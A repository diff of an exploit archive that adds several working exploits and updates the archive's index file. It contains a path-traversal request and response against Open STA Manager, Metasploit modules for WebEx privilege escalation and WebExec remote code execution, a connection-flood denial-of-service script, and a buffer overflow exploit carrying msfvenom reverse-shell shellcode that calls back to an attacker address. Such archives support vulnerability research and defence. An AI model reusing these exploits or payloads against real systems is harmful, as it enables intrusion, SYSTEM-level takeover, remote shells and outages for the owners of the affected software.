exploits/php/webapps/45693.txt Normal file
View file

@ -0,0 +1,55 @@
# Exploit Title: Open STA Manager 2.3 - Arbitrary File Download
# Dork: N/A
# Date: 2018-10-25
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.openstamanager.com/
# Software Link: https://sourceforge.net/projects/openstamanager/files/latest/download
# Version: 2.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/modules/backup/actions.php?op=getfile&file=[FILE]
#
# Technicians, Agents, Customers users group can run sql codes.
#
# /* `exploitdb`.`zz_users` */
$zz_users = array(
array('idutente' => '2','username' => 'efeefeefe','password' => '$2y$10$pesWR2SHoxriSupiXsBwX.tTFdsjk9XuJoZAS/L5thFUt97LMLiyu','email' => 'efe@omerefe.com','idanagrafica' => '0','idtipoanagrafica' => '0','idgruppo' => '4','enabled' => '1','created_at' => '2018-10-25 09:30:33','updated_at' => '2018-10-25 09:32:09')
);
#
# /[PATH]/modules/backup/actions.php
# ....
# 05 switch (filter('op')) {
# 06 case 'getfile':
# 07 $file = filter('file');
# 08
# 09 force_download($file, file_get_contents($backup_dir.$file));
# 10
# 11 break;
# ....
GET /[PATH]/modules/backup/actions.php?op=getfile&file=../../../../../Windows/win.ini HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=lt998mh6qs6qq2d7daj9ogdoa0
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 25 Oct 2018 09:43:40 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0, private
Pragma: public
Content-Disposition: attachment; filename="win.ini";
Content-Transfer-Encoding: binary
Content-Length: 564
X-Robots-Tag: noindex
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

202
exploits/windows/local/45696.rb Executable file
View file

@ -0,0 +1,202 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Services
include Msf::Post::Windows::Accounts
def initialize(info={})
super( update_info( info,
'Name' => 'WebEx Local Service Permissions Exploit',
'Description' => %q{
This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM,
can be used to run arbitrary commands locally, and can be started by limited users in
default installations.
},
'References' =>
[
['URL', 'https://webexec.org'],
['CVE', '2018-15442']
],
'DisclosureDate' => "Oct 09 2018",
'License' => MSF_LICENSE,
'Author' =>
[
'Jeff McJunkin <jeff.mcjunkin[at]gmail.com>'
],
'Platform' => [ 'win'],
'Targets' =>
[
[ 'Automatic', {} ],
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'SessionTypes' => [ "meterpreter" ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'WfsDelay' => 5,
'ReverseConnectRetries' => 255
},
'DefaultTarget' => 0
))
register_options([
OptString.new("DIR", [ false, "Specify a directory to plant the EXE.", "%SystemRoot%\\Temp"])
])
@service_name = 'webexservice'
end
def validate_arch
return target unless target.name == 'Automatic'
case sysinfo['Architecture']
when 'x86'
fail_with(Failure::BadConfig, 'Invalid payload architecture') if payload_instance.arch.first == 'x64'
vprint_status('Detected x86 system')
return targets[1]
when 'x64'
vprint_status('Detected x64 system')
return targets[2]
end
end
def check_service_exists?(service)
srv_info = service_info(service)
if srv_info.nil?
vprint_warning("Unable to enumerate services.")
return false
end
if srv_info && srv_info[:display].empty?
vprint_warning("Service #{service} does not exist.")
return false
else
return true
end
end
def check
unless check_service_exists?(@service_name)
return Exploit::CheckCode::Safe
end
srv_info = service_info(@service_name)
vprint_status(srv_info.to_s)
case START_TYPE[srv_info[:starttype]]
when 'Disabled'
vprint_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...")
return Exploit::CheckCode::Safe
when 'Manual'
vprint_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...")
return Exploit::CheckCode::Safe
when 'Auto'
vprint_good("Service is set to Automatically start...")
end
if check_search_path
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Appears
end
def check_write_access(path)
perm = check_dir_perms(path, @token)
if perm and perm.include?('W')
print_good("Write permissions in #{path} - #{perm}")
return true
elsif perm
vprint_status ("Permissions for #{path} - #{perm}")
else
vprint_status ("No permissions for #{path}")
end
return false
end
def exploit
begin
@token = get_imperstoken
rescue Rex::Post::Meterpreter::RequestError
vprint_error("Error while using get_imperstoken: #{e}")
end
fail_with(Failure::Unknown, "Unable to retrieve token.") unless @token
if is_system?
fail_with(Failure::Unknown, "Current user is already SYSTEM, aborting.")
end
print_status("Checking service exists...")
if !check_service_exists?(@service_name)
fail_with(Failure::NoTarget, "The service doesn't exist.")
end
if is_uac_enabled?
print_warning("UAC is enabled, may get false negatives on writable folders.")
end
# Use manually selected Dir
file_path = datastore['DIR']
@exe_file_name = Rex::Text.rand_text_alphanumeric(8)
@exe_file_path = "#{file_path}\\#{@exe_file_name}.exe"
service_information = service_info(@service_name)
# Check architecture
valid_arch = validate_arch
exe = generate_payload_exe(:arch => valid_arch.arch)
#
# Drop the malicious executable into the path
#
print_status("Writing #{exe.length.to_s} bytes to #{@exe_file_path}...")
begin
write_file(@exe_file_path, exe)
register_file_for_cleanup(@exe_file_path)
rescue Rex::Post::Meterpreter::RequestError => e
# Can't write the file, can't go on
fail_with(Failure::Unknown, e.message)
end
#
# Run the service
#
print_status("Launching service...")
res = cmd_exec("cmd.exe",
"/c sc start webexservice install software-update 1 #{@exe_file_path}")
if service_restart(@service_name)
print_status("Service started...")
else
service_information = service_info(@service_name)
if service_information[:starttype] == START_TYPE_AUTO
if job_id
print_status("Unable to start service, handler running waiting for a reboot...")
while(true)
break if session_created?
select(nil,nil,nil,1)
end
else
fail_with(Failure::Unknown, "Unable to start service, use exploit -j to run as a background job and wait for a reboot...")
end
else
fail_with(Failure::Unknown, "Unable to start service, and it does not auto start, cleaning up...")
end
end
end
end

0
exploits/windows/dos/45658.txt → exploits/windows/remote/45658.txt
View file

187
exploits/windows/remote/45695.rb Executable file
View file

@ -0,0 +1,187 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Windows XP systems that are not part of a domain default to treating all
# network logons as if they were Guest. This prevents SMB relay attacks from
# gaining administrative access to these systems. This setting can be found
# under:
#
# Local Security Settings >
# Local Policies >
# Security Options >
# Network Access: Sharing and security model for local accounts
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::SMB::Client::WebExec
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'WebExec Authenticated User Code Execution',
'Description' => %q{
This module uses a valid username and password of any level (or
password hash) to execute an arbitrary payload. This module is similar
to the "psexec" module, except allows any non-guest account by default.
},
'Author' =>
[
'Ron <ron@skullsecurity.net>',
],
'License' => MSF_LICENSE,
'Privileged' => true,
'DefaultOptions' =>
{
'WfsDelay' => 10,
'EXITFUNC' => 'thread'
},
'References' =>
[
['URL', 'https://webexec.org'],
[ 'CVE', '2018-15442' ],
],
'Payload' =>
{
'Space' => 3072,
'DisableNops' => true
},
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Native upload', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 24 2018'
))
register_options(
[
# This has to be a full path, %ENV% variables are not expanded
OptString.new('TMPDIR', [ true, "The directory to stage our payload in", "c:\\Windows\\Temp\\" ])
])
register_advanced_options(
[
OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
OptInt.new('MAX_LINE_LENGTH', [true, "The length of lines when splitting up the payload", 1000]),
])
end
# This is the callback for cmdstager, which breaks the full command into
# chunks and sends it our way. We have to do a bit of finangling to make it
# work correctly
def execute_command(command, opts)
# Replace the empty string, "", with a workaround - the first 0 characters of "A"
command = command.gsub('""', 'mid(Chr(65), 1, 0)')
# Replace quoted strings with Chr(XX) versions, in a naive way
command = command.gsub(/"[^"]*"/) do |capture|
capture.gsub(/"/, "").chars.map do |c|
"Chr(#{c.ord})"
end.join('+')
end
# Prepend "cmd /c" so we can use a redirect
command = "cmd /c " + command
execute_single_command(command, opts)
end
def exploit
print_status("Connecting to the server...")
connect(versions: [2,1])
print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
smb_login
if not simple.client.auth_user and not datastore['ALLOW_GUEST']
print_line(" ")
print_error(
"FAILED! The remote host has only provided us with Guest privileges. " +
"Please make sure that the correct username and password have been provided. " +
"Windows XP systems that are not part of a domain will only provide Guest privileges " +
"to network logins by default."
)
print_line(" ")
disconnect
return
end
begin
if datastore['SMBUser'].to_s.strip.length > 0
report_auth
end
# Avoid implementing NTLMSSP on Windows XP
# http://seclists.org/metasploit/2009/q1/6
if smb_peer_os == "Windows 5.1"
connect(versions: [1])
smb_login
end
wexec(true) do |opts|
opts[:flavor] = :vbs
opts[:linemax] = datastore['MAX_LINE_LENGTH']
opts[:temp] = datastore['TMPDIR']
opts[:delay] = 0.05
execute_cmdstager(opts)
end
handler
disconnect
end
end
def report_auth
service_data = {
address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
port: datastore['RPORT'],
service_name: 'smb',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
private_data: datastore['SMBPass'],
username: datastore['SMBUser'].downcase
}
if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
credential_data.merge!({
realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
realm_value: datastore['SMBDomain']
})
end
if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
credential_data.merge!({:private_type => :ntlm_hash})
else
credential_data.merge!({:private_type => :password})
end
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
login_data = {
access_level: 'Admin',
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
end

35
exploits/windows_x86-64/dos/45679.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: BORGChat 1.0.0 build 438 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-10-22
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://borgchat.10n.ro
# Software Link: http://borgchat.10n.ro/download.php
# Version: 1.0.0 build 438
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
#!/usr/bin/python
import socket
print "# # # # # # # #"
print "BORGChat 1.0.0"
print "# # # # # # # #"
print "\r\n"
Ip = raw_input("[Ip]: ")
Port = 7551 # Default port
arr=[]
c=0
while 1:
try:
arr.append(socket.create_connection((Ip,Port)))
arr[c].send("DOOM")
print "Sie!"
c+=1
except socket.error:
print "++ Done! ++"
raw_input()
break

55
exploits/windows_x86/local/45687.txt Normal file
View file

@ -0,0 +1,55 @@
# Exploit Title: Adult Filter 1.0 - Buffer Overflow (SEH)
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Discovery Date: 2018-10-25
# Homepage: http://www.armcode.com/adult-filter/
# Software Link: http://www.armcode.com/downloads/adult-filter.exe
# Version: 1.0
# Tested on: Windows XP Professional SP3 (ENG)
# Steps to Reproduce: Run the python exploit script, it will create a new file
# with the name "greetz-phr-key-onkan-cwd.txt".
# Start Adult Filter 1.0 click "Options" click "Black Domain List" click "Import"
# Select "greetz-cwd-onkan-key-phr.txt" and Click after select "name.txt" "OK" connect victim machine on port 1907
#!/usr/bin/python -w
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=1907 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a"
# Payload size: 351 bytes
filename="greetz-cwd-onkan-key-phr.txt"
shellcode=("\xba\x80\xfe\xaf\x95\xda\xcb\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x52\x83\xee\xfc\x31\x56\x0e\x03\xd6\xf0\x4d\x60\x2a\xe4\x10"
"\x8b\xd2\xf5\x74\x05\x37\xc4\xb4\x71\x3c\x77\x05\xf1\x10\x74"
"\xee\x57\x80\x0f\x82\x7f\xa7\xb8\x29\xa6\x86\x39\x01\x9a\x89"
"\xb9\x58\xcf\x69\x83\x92\x02\x68\xc4\xcf\xef\x38\x9d\x84\x42"
"\xac\xaa\xd1\x5e\x47\xe0\xf4\xe6\xb4\xb1\xf7\xc7\x6b\xc9\xa1"
"\xc7\x8a\x1e\xda\x41\x94\x43\xe7\x18\x2f\xb7\x93\x9a\xf9\x89"
"\x5c\x30\xc4\x25\xaf\x48\x01\x81\x50\x3f\x7b\xf1\xed\x38\xb8"
"\x8b\x29\xcc\x5a\x2b\xb9\x76\x86\xcd\x6e\xe0\x4d\xc1\xdb\x66"
"\x09\xc6\xda\xab\x22\xf2\x57\x4a\xe4\x72\x23\x69\x20\xde\xf7"
"\x10\x71\xba\x56\x2c\x61\x65\x06\x88\xea\x88\x53\xa1\xb1\xc4"
"\x90\x88\x49\x15\xbf\x9b\x3a\x27\x60\x30\xd4\x0b\xe9\x9e\x23"
"\x6b\xc0\x67\xbb\x92\xeb\x97\x92\x50\xbf\xc7\x8c\x71\xc0\x83"
"\x4c\x7d\x15\x03\x1c\xd1\xc6\xe4\xcc\x91\xb6\x8c\x06\x1e\xe8"
"\xad\x29\xf4\x81\x44\xd0\x9f\x6d\x30\xda\x48\x06\x43\xda\x71"
"\xa5\xca\x3c\x17\x59\x9b\x97\x80\xc0\x86\x63\x30\x0c\x1d\x0e"
"\x72\x86\x92\xef\x3d\x6f\xde\xe3\xaa\x9f\x95\x59\x7c\x9f\x03"
"\xf5\xe2\x32\xc8\x05\x6c\x2f\x47\x52\x39\x81\x9e\x36\xd7\xb8"
"\x08\x24\x2a\x5c\x72\xec\xf1\x9d\x7d\xed\x74\x99\x59\xfd\x40"
"\x22\xe6\xa9\x1c\x75\xb0\x07\xdb\x2f\x72\xf1\xb5\x9c\xdc\x95"
"\x40\xef\xde\xe3\x4c\x3a\xa9\x0b\xfc\x93\xec\x34\x31\x74\xf9"
"\x4d\x2f\xe4\x06\x84\xeb\x04\xe5\x0c\x06\xad\xb0\xc5\xab\xb0"
"\x42\x30\xef\xcc\xc0\xb0\x90\x2a\xd8\xb1\x95\x77\x5e\x2a\xe4"
"\xe8\x0b\x4c\x5b\x08\x1e")
evil="\x90"*20 + shellcode
# Bad chars : "\x00\x0a\x0d\x1a"
# 0x03912524 [SetMgr.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False | pop edi # pop esi # ret
b = "A"*4108 + "\xEB\x06\x90\x90" + "\x24\x25\x91\x03" + evil+ "B" * (1384-len(evil))
textfile = open (filename, 'w')
textfile.write(b)
textfile.close()

22
files_exploits.csv
View file

@ -6155,8 +6155,9 @@ id,file,description,date,author,type,platform,port
45650,exploits/multiple/dos/45650.txt,"Apple iOS/macOS - Sandbox Escape due to mach Message sent from Shared Memory",2018-10-22,"Google Security Research",dos,multiple,
45651,exploits/multiple/dos/45651.c,"Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport",2018-10-22,"Google Security Research",dos,multiple,
45652,exploits/ios/dos/45652.c,"Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas",2018-10-22,"Google Security Research",dos,ios,
45658,exploits/windows/dos/45658.txt,"ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)",2018-10-23,hyp3rlinx,dos,windows,
45679,exploits/windows_x86-64/dos/45679.py,"BORGChat 1.0.0 build 438 - Denial of Service (PoC)",2018-10-25,"Ihsan Sencan",dos,windows_x86-64,
45670,exploits/windows_x86/dos/45670.txt,"Adult Filter 1.0 - Denial of Service (PoC)",2018-10-24,"Beren Kuday GÖRÜN",dos,windows_x86,
45694,exploits/linux/dos/45694.c,"libtiff 4.0.9 - Decodes Arbitrarily Sized JBIG into a Target Buffer",2018-10-25,"Google Security Research",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10050,6 +10051,8 @@ id,file,description,date,author,type,platform,port
45653,exploits/windows/local/45653.rb,"Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows,
45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows,
45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows,
45687,exploits/windows_x86/local/45687.txt,"Adult Filter 1.0 - Buffer Overflow (SEH)",2018-10-25,AkkuS,local,windows_x86,
45696,exploits/windows/local/45696.rb,"WebEx - Local Service Permissions Exploit (Metasploit)",2018-10-25,Metasploit,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16890,7 +16893,9 @@ id,file,description,date,author,type,platform,port
45611,exploits/windows/remote/45611.c,"NoMachine < 5.3.27 - Remote Code Execution",2018-10-15,hyp3rlinx,remote,windows,
45629,exploits/hardware/remote/45629.txt,"FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials",2018-10-17,LiquidWorm,remote,hardware,
45638,exploits/linux/remote/45638.py,"libSSH - Authentication Bypass",2018-10-18,"Dayanç Soyadlı",remote,linux,
45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux,
45658,exploits/windows/remote/45658.txt,"ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write",2018-10-23,hyp3rlinx,remote,windows,
45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux,25
45695,exploits/windows/remote/45695.rb,"WebExec - Authenticated User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40026,6 +40031,7 @@ id,file,description,date,author,type,platform,port
45270,exploits/hardware/webapps/45270.txt,"Seagate Personal Cloud SRN21C 4.3.16.0 / 4.3.18.0 - SQL Injection",2018-08-27,"Yorick Koster",webapps,hardware,
45271,exploits/php/webapps/45271.txt,"Responsive FileManager < 9.13.4 - Directory Traversal",2018-08-27,"Simon Uvarov",webapps,php,80
45274,exploits/php/webapps/45274.html,"WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection",2018-08-27,"Lydéric Lefebvre",webapps,php,80
45680,exploits/php/webapps/45680.txt,"ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution",2018-10-25,AkkuS,webapps,php,
45284,exploits/php/webapps/45284.txt,"phpMyAdmin 4.7.x - Cross-Site Request Forgery",2018-08-29,VulnSpy,webapps,php,80
45286,exploits/hardware/webapps/45286.py,"Episerver 7 patch 4 - XML External Entity Injection",2018-08-29,"Jonas Lejon",webapps,hardware,
45296,exploits/windows_x86/webapps/45296.txt,"Argus Surveillance DVR 4.0.0.0 - Directory Traversal",2018-08-29,hyp3rlinx,webapps,windows_x86,8080
@ -40191,3 +40197,15 @@ id,file,description,date,author,type,platform,port
45676,exploits/hardware/webapps/45676.md,"D-Link Routers - Command Injection",2018-10-12,"Blazej Adamczyk",webapps,hardware,
45677,exploits/hardware/webapps/45677.md,"D-Link Routers - Plaintext Password",2018-10-12,"Blazej Adamczyk",webapps,hardware,
45678,exploits/hardware/webapps/45678.md,"D-Link Routers - Directory Traversal",2018-10-12,"Blazej Adamczyk",webapps,hardware,
45681,exploits/php/webapps/45681.txt,"Ekushey Project Manager CRM 3.1 - Cross-Site Scripting",2018-10-25,"Ismail Tasdelen",webapps,php,80
45682,exploits/php/webapps/45682.txt,"phptpoint Pharmacy Management System 1.0 - 'username' SQL injection",2018-10-25,"Boumediene KADDOUR",webapps,php,80
45683,exploits/php/webapps/45683.txt,"phptpoint Hospital Management System 1.0 - 'user' SQL injection",2018-10-25,"Boumediene KADDOUR",webapps,php,80
45684,exploits/php/webapps/45684.txt,"Simple Chat System 1.0 - 'id' SQL Injection",2018-10-25,"Ihsan Sencan",webapps,php,80
45685,exploits/php/webapps/45685.txt,"Delta Sql 1.8.2 - Arbitrary File Upload",2018-10-25,"Ihsan Sencan",webapps,php,
45686,exploits/php/webapps/45686.txt,"User Management 1.1 - Cross-Site Scripting",2018-10-25,"Ismail Tasdelen",webapps,php,80
45688,exploits/php/webapps/45688.txt,"ClipBucket 2.8 - 'id' SQL Injection",2018-10-25,"Ihsan Sencan",webapps,php,80
45689,exploits/php/webapps/45689.txt,"Simple POS and Inventory 1.0 - 'cat' SQL Injection",2018-10-25,"Ihsan Sencan",webapps,php,80
45690,exploits/php/webapps/45690.txt,"AiOPMSD Final 1.0.0 - 'q' SQL Injection",2018-10-25,"Ihsan Sencan",webapps,php,80
45691,exploits/php/webapps/45691.txt,"AjentiCP 1.2.23.13 - Cross-Site Scripting",2018-10-25,"Numan OZDEMIR",webapps,php,
45692,exploits/php/webapps/45692.txt,"MPS Box 0.1.8.0 - 'uuid' SQL Injection",2018-10-25,"Ihsan Sencan",webapps,php,80
45693,exploits/php/webapps/45693.txt,"Open STA Manager 2.3 - Arbitrary File Download",2018-10-25,"Ihsan Sencan",webapps,php,

Can't render this file because it is too large.